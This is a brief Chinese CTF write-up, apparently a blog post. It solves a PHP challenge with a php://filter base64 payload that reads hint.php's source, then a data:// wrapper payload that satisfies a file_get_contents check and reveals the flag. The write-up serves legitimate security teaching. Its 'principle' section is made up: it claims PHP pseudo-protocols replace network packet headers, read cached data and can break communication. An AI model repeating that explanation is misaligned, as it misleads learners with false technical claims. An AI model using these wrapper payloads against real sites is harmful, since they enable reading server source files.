题目内容
进入页面首先看题目,寻找 hint.php 文件,提供的参数为 wllm
解题思路
优先考虑能否使用 php伪协议 直接读取缓存中的数据。
知识点:PHP伪协议
原理:通过替换数据报的头部信息直接读取缓存中的数据,而不需要进行解析。
缺点:由于替换数据报的头部信息来实现,网络协议的完整性会产生冲突,如果网络协议的头部信息被PHP伪协议替换了,可能会导致网络协议的完整性被破坏,从而导致通信中断。
解题步骤一
用HackBar请求后得到,得到如图所示的一段base64结果
?wllm=php://filter/read/convert.base64-encode/resource=hint.php
解题步骤二
用在线解码工具解析得到的base64编码得到以下内容,由此得到访问 /test2222222222222.php
解题步骤三
得到如下php代码:
<?php
ini_set("max_execution_time", "180");
show_source(__FILE__);
include('flag.php');
$a= $_GET["a"];
if(isset($a)&&(file_get_contents($a,'r')) === 'I want flag'){
echo "success\n";
echo $flag;
}
?>
解法:通过 data:// 协议的方式再次请求以获得flag
?a=data://text/plain,I want flag
扫一扫
551
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
